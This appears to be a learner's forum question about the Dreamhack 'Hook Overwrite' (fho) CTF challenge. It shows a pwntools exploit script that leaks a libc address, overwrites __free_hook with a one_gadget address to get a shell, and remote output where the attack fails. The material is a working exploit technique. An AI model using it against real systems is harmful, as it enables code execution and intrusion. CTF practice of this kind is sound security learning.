I'm following along with the Hook Overwrite exercise via the exploit test.
Locally I got as far as the flag value, but on the actual server the flag doesn't come out. Can you tell me what the problem is?
Code:
#!/usr/bin/python3
from pwn import *

p = remote("host1.dreamhack.games", 17917)
#p = process("./fho")
e = ELF("./fho")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

def slog(name, addr):
    # Print a named address in hex
    return success(": ".join([name, hex(addr)]))

# Fill the buffer up to the saved return-address slot so the leak follows it
buf = b"A" * 0x48
p.sendafter(b"Buf: ", buf)
p.recvuntil(buf)

# Leaked 6-byte address padded to 8 bytes; offset from __libc_start_main
libc_start_main_xx = u64(p.recvline()[:-1] + b"\x00" * 2)
libc_base = libc_start_main_xx - 0x021b97
free_hook = libc_base + libc.symbols["__free_hook"]
og = libc_base + 0x4f302

slog("libc_base", libc_base)
slog("free_hook", free_hook)

# Overwrite __free_hook with the one_gadget address, then trigger free()
p.recvuntil(b"To write: ")
p.sendline(str(free_hook).encode())
p.recvuntil(b"With: ")
p.sendline(str(og).encode())
p.recvuntil(b"To free: ")
p.sendline(str(0x31337).encode())  # doesn't matter

p.interactive()
Server response:
hyunmin@WMRRD11-NC102M3:~/hyunmin$ python result.py
[+] Opening connection to host1.dreamhack.games on port 17917: Done
[*] '/home/hyunmin/hyunmin/fho'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/lib/x86_64-linux-gnu/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] libc_base: 0x7f4ec0479060
[+] free_hook: 0x7f4ec0866948
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls